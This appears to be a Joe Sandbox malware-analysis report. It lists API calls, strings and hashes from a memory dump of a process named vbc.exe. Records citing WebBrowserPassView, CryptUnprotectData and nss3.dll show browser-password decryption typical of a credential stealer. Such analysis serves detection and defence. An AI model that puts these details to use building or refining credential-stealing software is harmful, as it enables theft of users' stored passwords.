                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                    • Opcode ID: 23fbd524af4de12edaef0e362b86099d5f7adf1057b4181ed4aaf7bf29872c53
                                                                                                                                                    • Instruction ID: ec6d441468c88601e944e5005585d56a697b1d5e2a610cd326798869af21cd90
                                                                                                                                                    • Opcode Fuzzy Hash: 23fbd524af4de12edaef0e362b86099d5f7adf1057b4181ed4aaf7bf29872c53
                                                                                                                                                    • Instruction Fuzzy Hash: 0F012D72E4431575F720AB519C46BBF73A89F40B19F10407FFC14A50C2EABCEA444A99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • wcscpy.MSVCRT ref: 00441B9B
                                                                                                                                                    • wcscat.MSVCRT ref: 00441BAA
                                                                                                                                                    • wcscat.MSVCRT ref: 00441BBB
                                                                                                                                                    • wcscat.MSVCRT ref: 00441BCA
                                                                                                                                                    • VerQueryValueW.VERSION(?,?,00000000,?), ref: 00441BE4
                                                                                                                                                      • Part of subcall function 00407447: wcslen.MSVCRT ref: 0040744E
                                                                                                                                                      • Part of subcall function 00407447: memcpy.MSVCRT ref: 00407464
                                                                                                                                                      • Part of subcall function 00407511: lstrcpyW.KERNEL32 ref: 00407526
                                                                                                                                                      • Part of subcall function 00407511: lstrlenW.KERNEL32(?), ref: 0040752D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                    • API String ID: 393120378-2245444037
                                                                                                                                                    • Opcode ID: cb6593bce41ce7101ed3919308bda3c7e7c8e8e4aeb4a4d700e0b9c8d6b6edb1
                                                                                                                                                    • Instruction ID: a565dbaf5ef1236623e3a457584e7ee1bc303587053621a732091bcd91b9d386
                                                                                                                                                    • Opcode Fuzzy Hash: cb6593bce41ce7101ed3919308bda3c7e7c8e8e4aeb4a4d700e0b9c8d6b6edb1
                                                                                                                                                    • Instruction Fuzzy Hash: 27017C7290020CB6EF51EAA1CD45EDF77BCAF04308F4005A7B514E2052EB78DB86AB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                    • Opcode ID: 8becf3e9218155cd2e90e25ed978c4695a92d6ded04a6fa8cdd08c494461b467
                                                                                                                                                    • Instruction ID: 8e174b2d8d79018ad6e296a97c01706163ed31911536b8ede193c50f01e1bc5f
                                                                                                                                                    • Opcode Fuzzy Hash: 8becf3e9218155cd2e90e25ed978c4695a92d6ded04a6fa8cdd08c494461b467
                                                                                                                                                    • Instruction Fuzzy Hash: CBE0B679A8830079F96025861E4BB2E61508774F59FB0886FF50AB05D1E9FE95A8710F
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy
• String ID: !-A$Y,A$a,A$a,A$,A
• API String ID: 3510742995-194831239
• Opcode ID: 222890697f8a5ff6857447b5b90ef297a0c92120cc092e5eca8f4e6b223797c7
• Instruction ID: c1edbe63f0487e6d5a9ef4690cfcbd933ff0b0d7cc0200e8d9d6566c39fc0ab4
• Opcode Fuzzy Hash: 222890697f8a5ff6857447b5b90ef297a0c92120cc092e5eca8f4e6b223797c7
• Instruction Fuzzy Hash: C8E04F35980610EAF330DB459C07B863394A796756F50C43BF508A6193C6FC599C8B9D
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402
• Opcode ID: 46f26c3fdd6910b4d7312f8d71752383c86baf733d40e003e56e3ea4decbe60e
• Instruction ID: a56ed1d78848c17894bc611d03527086a745bd119e00672256ad5f5daa2e3940
• Opcode Fuzzy Hash: 46f26c3fdd6910b4d7312f8d71752383c86baf733d40e003e56e3ea4decbe60e
• Instruction Fuzzy Hash: 93818E706093619FDB10DF15E88161FB7E0BF98354F94885FE8849B252EB78EC44CB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040F96C,00000000,00000000), ref: 00410F16
• memset.MSVCRT ref: 00410F78
• memset.MSVCRT ref: 00410F88
  • Part of subcall function 00410DF5: wcscpy.MSVCRT ref: 00410E1E
• memset.MSVCRT ref: 00411073
• wcscpy.MSVCRT ref: 00411094
• CloseHandle.KERNEL32(?,0040F96C,?,?,?,0040F96C,00000000,00000000), ref: 004110EA
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3300951397-0
• Opcode ID: b54469c95767e19cd25d0ac2b448a79aecc0fd22ddb34440915382161dbe33e5
• Instruction ID: ff77c4a4bb0d76b6113ba9f034b07e179d87586f5f3f4fadb46fa2bb0041fc85
• Opcode Fuzzy Hash: b54469c95767e19cd25d0ac2b448a79aecc0fd22ddb34440915382161dbe33e5
• Instruction Fuzzy Hash: CB5170B0508381AFD720DF55DC85A9BBBE8FBC8305F00492EF68882261DB74D985CB66
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040D560
  • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
  • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
  • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
  • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
  • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
  • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
  • Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
  • Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
  • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
  • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
  • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
  • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97
  • Part of subcall function 00407B1D: GetSaveFileNameW.COMDLG32(?), ref: 00407B6C
  • Part of subcall function 00407B1D: wcscpy.MSVCRT ref: 00407B83
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 1392923015-3614832568
• Opcode ID: 380410c26e3291804c03af3795505405ed94cd18fa0364bdc388fa92e87f834b
• Instruction ID: 456ec3227f593179f02471f626d387f8bd8a0122acdd439c58b7a13f613657e4
• Opcode Fuzzy Hash: 380410c26e3291804c03af3795505405ed94cd18fa0364bdc388fa92e87f834b
• Instruction Fuzzy Hash: 6131FAB1D002599BDB50EFA9D8C1AEDBBB4FF09314F10417AF508B7282DF385A458B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00415E2B
• GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00415E39
• free.MSVCRT(00000000), ref: 00415E7F
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
• Opcode ID: e3e327bc7edfa6d214c9f68350b0f1db51016015cf148b15bb91f804a777c83b
• Instruction ID: de39e7dabe3dcffc9507685f2d24beb71d21f2267e90135c35d9c9407e9ebe28
• Opcode Fuzzy Hash: e3e327bc7edfa6d214c9f68350b0f1db51016015cf148b15bb91f804a777c83b
• Instruction Fuzzy Hash: B111A236D04B05EBDB106FB498C06FF7368AA85754B54013BF911E6280D7789F8195AA
Uniqueness
Uniqueness Score: -1.00%

APIs
• AreFileApisANSI.KERNEL32 ref: 00414D2B
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D49
• malloc.MSVCRT ref: 00414D53
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D6A
• free.MSVCRT(?), ref: 00414D73
• free.MSVCRT(?,?), ref: 00414D91
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0
• Opcode ID: fcdf128664d182e83d2fd65dada33940b5d141c4db74cea0fb43d282e6a1fb2b
• Instruction ID: 75ff5f127907765bac19b59c8f0cf631f86937604d45831965c424c16304f1b7
• Opcode Fuzzy Hash: fcdf128664d182e83d2fd65dada33940b5d141c4db74cea0fb43d282e6a1fb2b
• Instruction Fuzzy Hash: 3501D4725041257BAF225BB6AC41DFF369CDF857B4721022AFC04E3280EA288E4141EC
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTempPathW.KERNEL32(000000E6,?,?,00415592), ref: 00415A0A
• GetTempPathA.KERNEL32(000000E6,?,?,00415592), ref: 00415A32
• free.MSVCRT(00000000,0044A338,00000000), ref: 00415A5A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710
• Opcode ID: c9ef72f7e900502d242bf52f2b84dfc3543ee2498ca2d646e121c62c04ad21fe
• Instruction ID: 407cf19e3f66aff666bf3235626637e86bc259e86a40955958787b48e693a0c3
• Opcode Fuzzy Hash: c9ef72f7e900502d242bf52f2b84dfc3543ee2498ca2d646e121c62c04ad21fe
• Instruction Fuzzy Hash: 80316831A44645DAE720EB61DCC1BFB739C9FA4348F1405BFE841D6182FE6C8EC54A19
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
  • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
• memset.MSVCRT ref: 0040C129
  • Part of subcall function 004124C0: memcpy.MSVCRT ref: 0041253D
  • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
  • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
• _snwprintf.MSVCRT ref: 0040C173
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 2236007434-2769808009
• Opcode ID: 438c6ceffbcd68a890abf2b9136991ccf46c150bae825d1d06f9ba09c855681a
• Instruction ID: bd8afa7c54c2b984639c4d8fb182e53c6b214fce1ab7be0445daf1b4a409d2ac
• Opcode Fuzzy Hash: 438c6ceffbcd68a890abf2b9136991ccf46c150bae825d1d06f9ba09c855681a
• Instruction Fuzzy Hash: 82119132904615BFEB11AF65DC82E99BB74FF04318F10402AF9046A5E2DB75B960CBD8
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040D86C
  • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
• wcsrchr.MSVCRT ref: 0040D886
• wcscat.MSVCRT ref: 0040D8A2
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                    • String ID: .cfg$General
                                                                                                                                                    • API String ID: 776488737-1188829934
                                                                                                                                                    • Opcode ID: e11df5378bc83a8aaf871442e4d8661d85e0e936ac587c009724adb380b412fa
                                                                                                                                                    • Instruction ID: b769b6074c2bbd437ee926744873151467191c08e4afcaaf49059e595a4f98b4
                                                                                                                                                    • Opcode Fuzzy Hash: e11df5378bc83a8aaf871442e4d8661d85e0e936ac587c009724adb380b412fa
                                                                                                                                                    • Instruction Fuzzy Hash: 34119877901318AADB10EF55DC45ECE7378AF48314F1041F6F518A7182DB78AA848F9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040E051
                                                                                                                                                    • RegisterClassW.USER32 ref: 0040E076
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040E07D
                                                                                                                                                    • CreateWindowExW.USER32 ref: 0040E09C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                    • String ID: WebBrowserPassView
                                                                                                                                                    • API String ID: 2678498856-2171583229
                                                                                                                                                    • Opcode ID: 968ab77318ecbfefce790601fd2619178d52abf01415595e0110a8aaad309429
                                                                                                                                                    • Instruction ID: d6937ed4ed068f8a41babfbfc400960a7e9d41ce1fcf29d78c1aeb4d070e2d0f
                                                                                                                                                    • Opcode Fuzzy Hash: 968ab77318ecbfefce790601fd2619178d52abf01415595e0110a8aaad309429
                                                                                                                                                    • Instruction Fuzzy Hash: 5301C4B1901629ABDB019F998D89ADFBFBCFF09B50F10421AF514A2240D7B45A408BE9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040C2EB
                                                                                                                                                    • memset.MSVCRT ref: 0040C302
                                                                                                                                                      • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                                                                                                      • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                                                                                                                      • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                                                                                                                      • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040C33E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>
                                                                                                                                                    • API String ID: 168708657-3296998653
                                                                                                                                                    • Opcode ID: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
                                                                                                                                                    • Instruction ID: 826567bfe222e6a97a7157a9ef984588091dd6de8d25c20f5ec279ce0d2f683a
                                                                                                                                                    • Opcode Fuzzy Hash: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
                                                                                                                                                    • Instruction Fuzzy Hash: 780167F2D401297AEB20A755CC46FEE767CEF44308F0000B6BB09B61D1DB78AA458A9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                    • API String ID: 145871493-1827663648
                                                                                                                                                    • Opcode ID: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
                                                                                                                                                    • Instruction ID: e5a88ed766aaa6e52f35248584035ac6595561cae6bd6684aeb1aa38a92ec81b
                                                                                                                                                    • Opcode Fuzzy Hash: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
                                                                                                                                                    • Instruction Fuzzy Hash: 0A011A32500611ABC6219F158C4881BFEEAEBA1B42724887FF1C5E2660C3748A80CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • wcscpy.MSVCRT ref: 00411DC1
                                                                                                                                                    • wcscpy.MSVCRT ref: 00411DDC
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040D8DB,00000000,?,0040D8DB,?,General,?), ref: 00411E03
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 00411E0A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                    • String ID: General
                                                                                                                                                    • API String ID: 999786162-26480598
                                                                                                                                                    • Opcode ID: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
                                                                                                                                                    • Instruction ID: 9a0facac0be4658f1d28dd1d6e0b9c096870c14066d41f215ae7e32982aabb00
                                                                                                                                                    • Opcode Fuzzy Hash: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
                                                                                                                                                    • Instruction Fuzzy Hash: 9AF024B2508301BFF3109B90AC85EAF769CDB10799F20842FF20591061DA396D50825D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
                                                                                                                                                    • _snwprintf.MSVCRT ref: 004071FE
                                                                                                                                                    • MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                    • Opcode ID: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
                                                                                                                                                    • Instruction ID: 3b05860ebe56c522f2c5ab20428fa68284bb982c16b5ab54bfd07cc8ba07ffa8
                                                                                                                                                    • Opcode Fuzzy Hash: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
                                                                                                                                                    • Instruction Fuzzy Hash: 74F0E23680021867DB11AB94CC02FDA72ACBB54B82F0400AAB905F2180EAF4EB404A69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(shlwapi.dll,74EB48C0,?,004048E6,00000000), ref: 0041245E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                    • API String ID: 145871493-1506664499
                                                                                                                                                    • Opcode ID: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
                                                                                                                                                    • Instruction ID: b7e45597e31c4a606350929a185ef34a25fe7475720eeaf8429eabe2a59cceae
                                                                                                                                                    • Opcode Fuzzy Hash: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
                                                                                                                                                    • Instruction Fuzzy Hash: 6BD05B393502206BA7116F35BC48EAF2E65EFC6F537150031F501D1260CB544E429669
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                    • API String ID: 0-1953309616
                                                                                                                                                    • Opcode ID: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
                                                                                                                                                    • Instruction ID: 956c7fa9d19c0f39a897be9568c0d7cc0038550a6314a583777b8070e5951de7
                                                                                                                                                    • Opcode Fuzzy Hash: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
                                                                                                                                                    • Instruction Fuzzy Hash: 90E18F71E00208EFDF14DFA5D881AAEBBB5FF48304F14846EE805AB251DB79AE41CB55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 0042EFB9
                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 0042EE56
                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 0042EE2E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                    • Opcode ID: 26b123652edab92ce6a15b49f3ba4f50a5fd80d5e605533ee84f76b45fb6fb0c
                                                                                                                                                    • Instruction ID: 495bb5eb18a6352e4e4c54452741b55d9a16d19d8a312fbbfa639f366bc90293
                                                                                                                                                    • Opcode Fuzzy Hash: 26b123652edab92ce6a15b49f3ba4f50a5fd80d5e605533ee84f76b45fb6fb0c
                                                                                                                                                    • Instruction Fuzzy Hash: 72914C71A0021ADFCB10CF5AD580A9EBBF1FF58314B55856AE809AB302D735E945CF98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetwcslen$wcscatwcscpy
                                                                                                                                                    • String ID: nss3.dll
                                                                                                                                                    • API String ID: 1250441359-2492180550
                                                                                                                                                    • Opcode ID: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
                                                                                                                                                    • Instruction ID: 7e6fc29c8000acf8dfdc2cef167c58109b3e52db234c734628f4c22aee9d38d0
                                                                                                                                                    • Opcode Fuzzy Hash: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
                                                                                                                                                    • Instruction Fuzzy Hash: E711ECB2D0421DAADB10E750DD45BCA73EC9F10314F1004B7F60CE20C2F778AA548A9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06
